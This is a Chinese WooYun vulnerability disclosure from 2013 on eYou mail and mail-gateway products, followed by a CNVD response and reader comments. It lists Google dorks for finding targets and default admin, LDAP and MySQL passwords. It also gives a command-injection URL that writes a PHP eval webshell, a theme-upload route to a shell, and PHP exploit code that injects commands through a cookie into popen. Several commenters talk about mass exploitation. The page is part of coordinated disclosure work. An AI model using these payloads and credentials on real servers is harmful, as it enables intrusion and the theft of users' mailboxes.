当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021473

漏洞标题:【国内数千机构邮箱的沦陷】eYou邮箱系统系列产品若干个漏洞

相关厂商:亿邮

漏洞作者: YwiSax

提交时间:2013-04-10 11:50

修复时间:2013-05-25 11:50

公开时间:2013-05-25 11:50

漏洞类型:用户资料大量泄漏

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-10: 细节已通知厂商并且等待厂商处理中
2013-04-12: 厂商已经确认,细节仅向厂商公开
2013-04-22: 细节向核心白帽子及相关领域专家公开
2013-05-02: 细节向普通白帽子公开
2013-05-12: 细节向实习白帽子公开
2013-05-25: 细节向公众公开

简要描述:

eYou是目前国内机构(高校、政府、企业)使用率最高的邮箱系统之一。
今发现eYou邮件系统、eYou邮件网关系统有多处严重的安全隐患,攻击者可入侵服务器和盗取任意邮箱信息。
影响版本:2007年以后所有版本,包括最新版。

详细说明:

** 查找目标
google搜索以下关键词寻找使用eyou的目标
> intitle:亿邮通讯
> inurl:mail intext:蔚蓝天空
或者只是搜索inurl:gw或者inurl:gate.等都可以搜索到。
嗯,搜索inurl:mail site:edu.cn和inurl:mail site:gov.cn也可以找到目标。。。
部分网站修改了默认的模版,不过只要看http://www.target.com/admin/还是可以很轻松判断是不是eYou。
使用旧版的站比较多,绝对比例有95%以上。
** 1.默认配置漏洞
这里的情况旧版新版都存在。首先默认的网关系统是跟邮件系统在一个机器上的,访问8080端口即可。
> http://www.target.com/admin/
> 默认账户 admin aaaaa,部分站点还有eyoutest之类的账户,不知道是不是eyou的工作人员测试的时候留下忘记删除的账户,同样密码为aaaaa
登录后直接导出所有用户。。。
> 默认LDAP信息:eyouadmin aaaaa
> 默认MySQL信息: root 密码空
> 网关后台http://www.target.com:8080/admin/或http://www.target.com:8080/gw/admin/
> 有三个默认账户,分别为
> admin:+-ccccc
> eyougw:admin@(eyou)
> eyouuser:eyou_admin
网关处的管理员是存放在mysql中,可是eYou产品在安装过程中没有任何提示要求更改此处密码,算是官方留的后门吗?
查看投递日志可以查看敏感信息。

1.png


eyou邮件后台.jpg


** 2.旧版网关漏洞
网关系统这里问题挺严重的喔,只要能访问到网关,只要在网关处能查看到队列什么的,就能执行命令
利用URL:
> php/mailaction1.php?action=x&index=738952509.37684;echo '<?php eval($_REQUEST[cmd]) ?>'>/opt/apache/htdocs/t1.php
> php/mailaction1.php?action=x&index=738952509.37684;ls>t1.php
index参数没过滤,直接带入执行了。
旧版网关很多处地方有类似问题的,认真看下代码就发现了。
入侵者得到webshell之后,直接使用/var/eyou/sbin/userdb_extract domain就能导出该域下所有用户的账户信息!
这里的影响版本貌似是3.6-4.0

QQ截图20130409204109.jpg


** 3.新版网关漏洞
新版网关比旧版的要安全多了。。。不过它之所以安全多了,是因为把代码写复杂了。。。把要研究的人都给绕晕了。。。
顺便吐槽下这个新旧版本代码变化也太大了把。。。
用前面发现的账户登录网关后台。我抓了一大堆网址,然后自己写脚本来模拟登录,20+个站点没有一个修改了该处的密码。。。所以这里新版后台登录的成功率是很高的。
新版本的网关,对用户默认输入的参数都进行了过滤,过滤了<、>什么的,然后注射啊命令执行什么的暂时还木有发现。
不过在管理配置那里的风格管理,对上传的风格包,系统没有任何判断就直接覆盖到gw/css/目录去了。
然后入侵者就简单了,用上面的后门账户登录网关后台,下载默认的风格包,解压后加入php文件,然后上传覆盖。。。ok,getshell成功,然后就没然后了。
影响版本为网关4.0以后的版本

getshell.jpg


** 4.邮箱系统远程执行漏洞
前面三个项目都或多或少都有条件限制,不够劲爆,再来个劲爆的,只要邮箱对外访问,就能直接getshell。
问题在http://www.target.com/grad/admin/domain_logo.php这里,这个文件直接读取Cookie("cookie"),然后就带入popen了,没任何过滤,多好啊。
exp可以参考下面的代码来写,很简单很弱智的漏洞

public function action_test()
	{
		$domain = $_GET['domain'];
		$url = "http://$domain/grad/admin/domain_logo.php";
		$cmd = "ls>test.txt";
		$req = Request::factory($url)
			->cookie('cookie', "/php/lib/;$cmd")
			//->send_headers()
			->execute();
		echo $domain;
		echo '<br />';
		echo $cmd;
		//echo '<br />';
		//$remote_url = "http://$domain/grad/admin/test.txt";
		//$rs = file_get_contents($remote_url);
		//echo $rs ? 'Has bug!' : 'No bug!';
		//$req2 = Request::factory($url)
		//	->cookie('cookie', "/php/lib/;rm test.txt")
			//->send_headers()
		//	->execute();
		exit;
	}


利用上面几个漏洞,只要是使用eYou的邮箱系统,就99%会被入侵。看客请自重。
写得不好,看懂怎么回事就行了、、、

漏洞证明:

亲测吧,各位。
前段时间已经发了细节给厂商。
话说亿邮你能不能重视一下下,都是用户数据啊。。。

修复方案:

更新到最新版本。
或者干脆点,换其他的邮箱系统吧,CoreMail、AnyMacro等等都可以。。。

版权声明:转载请注明来源 YwiSax@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-04-12 17:24

厂商回复:

CNVD确认并复现所述情况,同时已联系上软件生产厂商,根据实测情况以及厂商反馈的产品信息,对白帽子所述情况进行一个更新:
所述“影响版本:2007年以后所有版本,包括最新版”以及“影响版本为网关4.0以后的版本”。通过实测情况,暂时不能确认这样的情况;目前,电子邮件产品受影响涉及V4部分版本,电子邮件网关产品受影响涉及V3.6-4.0版本。
软件生产厂商已经积极响应,预计在一至两周内提供完善的修复方案,同时根据CNVD处置流程要求做好用户的点对点修复工作。
此外,根据后续源码分析情况,发现另一处远程代码执行风险点。
按多个漏洞进行评分,rank 40?请xsser决定。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-04-10 12:06 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    给力,用这个的不少啊

  2. 2013-04-10 12:07 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:141 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    mark

  3. 2013-04-10 12:16 | Nicky ( 普通白帽子 | Rank:477 漏洞数:68 | http://www.droidsec.cn 安卓安全中文站)

    xss

  4. 2013-04-10 12:41 | none ( 实习白帽子 | Rank:40 漏洞数:5 | 十次十次啊 hack it then know more~)

    @xsser 如果是原创发现的漏洞 建议精华吧

  5. 2013-04-10 13:40 | f1eecy ( 路人 | Rank:21 漏洞数:4 | 图书管理员~)

    这个牛~

  6. 2013-04-10 13:46 | zidane ( 路人 | Rank:13 漏洞数:2 | 噢 乖,你们应该明白 这样下去对我们谁都不...)

    需要这个!

  7. 2013-04-10 13:52 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    @none 收到!

  8. 2013-04-10 14:12 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    这个给力,流弊!!!!

  9. 2013-04-10 14:33 | cncert国家互联网应急中心(乌云厂商)

    这个可以爆rank了。

  10. 2013-04-10 16:10 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    @cncert国家互联网应急中心 cert先给个rank吧 哈哈

  11. 2013-04-10 17:10 | cncert国家互联网应急中心(乌云厂商)

    给40或者60差不多。有个exp还在改写成jar包程序,改完后确认哈。这个不想确认这么早,这两天主要精力就是在测试了,已经发动各省力量在测试了。

  12. 2013-04-10 20:02 | YwiSax ( 实习白帽子 | Rank:62 漏洞数:4 | 淡定。)

    @cncert国家互联网应急中心 哈哈,谢啦。= = 有黑阔证发的吗?

  13. 2013-04-10 22:31 | cncert国家互联网应急中心(乌云厂商)

    @YwiSax 这个要没有就说不过去了。这个放在黑产里都值不少RMB.

  14. 2013-04-11 11:49 | MEng ( 路人 | Rank:1 漏洞数:2 | 刚接触这个领域、来学习了)

    旧版本问题确实很多

  15. 2013-04-11 12:18 | shine 认证白帽子 ( 普通白帽子 | Rank:831 漏洞数:76 | coder)

    @cncert国家互联网应急中心 恩!生活真有这么美好,工作真这么有干劲?

  16. 2013-04-11 12:28 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:17 | 当我又回首一切,这个世界会好吗?)

    @shine ....... 为实现四个现代化而努力啊

  17. 2013-04-12 17:30 | zzR 认证白帽子 ( 核心白帽子 | Rank:1382 漏洞数:111 | 收wb 1:5 无限量收 [平台担保])

    这个洞公开了,不知道多少单位倒下去呀!!!@WOOYUN君

  18. 2013-04-12 17:32 | cncert国家互联网应急中心(乌云厂商)

    @zzR 已经发动各省力量在测,有一部分省份已经开始处置。

  19. 2013-04-12 22:07 | Defa ( 普通白帽子 | Rank:113 漏洞数:13 | <img src=1 onerror=alert(1)>)

    真牛逼。。。

  20. 2013-04-14 20:15 | 小胖子 认证白帽子 ( 核心白帽子 | Rank:1727 漏洞数:125 | 如果大海能够带走我的矮丑...)

    爆胎了,真可怕,40!

  21. 2013-04-16 19:15 | jk_影 ( 实习白帽子 | Rank:59 漏洞数:9 | 专注google三十年)

    牛逼爆了

  22. 2013-04-22 19:56 | Valo洛洛 ( 普通白帽子 | Rank:458 漏洞数:52 | 。)

    我们学校是2.0!!!!!!!!!!!!!!!!!!

  23. 2013-04-29 15:24 | pangshenjie ( 普通白帽子 | Rank:110 漏洞数:14 )

    额,被提交了,目测手里只有一个亿邮垃圾邮件网关的代码执行。

  24. 2013-04-29 20:34 | Golova ( 路人 | Rank:22 漏洞数:3 | 过去过不去的终究会过去。)

    ls煞笔。

  25. 2013-05-03 09:31 | Eric ( 路人 | Rank:1 漏洞数:1 | 网络技术爱好者。)

    这个貌似很厉害的样子。。

  26. 2013-05-03 11:04 | tnt1200 ( 普通白帽子 | Rank:121 漏洞数:11 | 关注飞机安全....)

    mark

  27. 2013-05-04 19:53 | Breaker ( 路人 | Rank:12 漏洞数:1 )

    我擦 我们学校就是这个邮箱系统

  28. 2013-05-05 16:15 | 园长 ( 普通白帽子 | Rank:134 漏洞数:14 | 你在身边就是缘,缘分写在数据库里面。)

    @Breaker 真相在这里 http://user.qzone.qq.com/573080035/blog/1367505747#!app=2&via=QZ.HashRefresh&pos=1367505747

  29. 2013-05-07 10:41 | Eric ( 路人 | Rank:1 漏洞数:1 | 网络技术爱好者。)

    貌似没成功。。。

  30. 2013-05-10 12:02 | Breaker ( 路人 | Rank:12 漏洞数:1 )

    @园长 呵呵,谢谢,我之前已经找到这篇文章了

  31. 2013-05-10 12:41 | Breaker ( 路人 | Rank:12 漏洞数:1 )

    有没有谁可以告诉我亿邮的加密算法,{smd5}那个

  32. 2013-05-16 06:11 | 廷廷 ( 路人 | Rank:0 漏洞数:1 | 有很强的好奇心,爱好广泛,求女女带走。。...)

    啊咯!这是要逆天,囊括全国啊

  33. 2013-05-16 10:25 | DarkSun.Evil ( 路人 | Rank:14 漏洞数:2 | 请多关照...Thx...)

    这个牛B ,刚刚的呀! 哎呀妈呀

  34. 2013-05-17 08:47 | 松子 ( 实习白帽子 | Rank:45 漏洞数:5 | 无事)

    这个很牛逼。但是貌似很的邮箱系统都有漏洞。只不过没人挖而已。

  35. 2013-05-20 21:48 | 双人份 ( 路人 | Rank:8 漏洞数:3 | 打发点咯)

    必须使用默认帐号登入上去才行?

  36. 2013-05-31 09:20 | Jesus ( 实习白帽子 | Rank:60 漏洞数:18 | 天地不仁,以万物为刍狗!)

    咳,早知道先通杀一下了,放出来了。。。。还蛮全的

  37. 2013-06-01 00:37 | 双人份 ( 路人 | Rank:8 漏洞数:3 | 打发点咯)

    @ Jesus 如果没有默认帐号登入怎么办?

  38. 2013-06-26 23:26 | blacksun ( 路人 | Rank:13 漏洞数:1 | blacksun)

    洞主一共就发过两个洞,“第一次”就精了。牛X了

  39. 2013-10-19 10:45 | 一天到晚吃 ( 实习白帽子 | Rank:58 漏洞数:17 | 好好看,好好学 test12xx)

    给力~~

  40. 2014-11-20 18:02 | 小鸟游六花 ( 路人 | Rank:0 漏洞数:1 | 数据库 java php asp c htm5)

    邮件系统交流 qq群191483117 给力啊

  41. 2014-11-20 18:03 | 小鸟游六花 ( 路人 | Rank:0 漏洞数:1 | 数据库 java php asp c htm5)

    @pangshenjie 先搞个亿邮系统求指教

  42. 2014-12-18 18:23 | 新小浪 ( 路人 | Rank:0 漏洞数:1 | 计算机小白)

    @Breaker 求解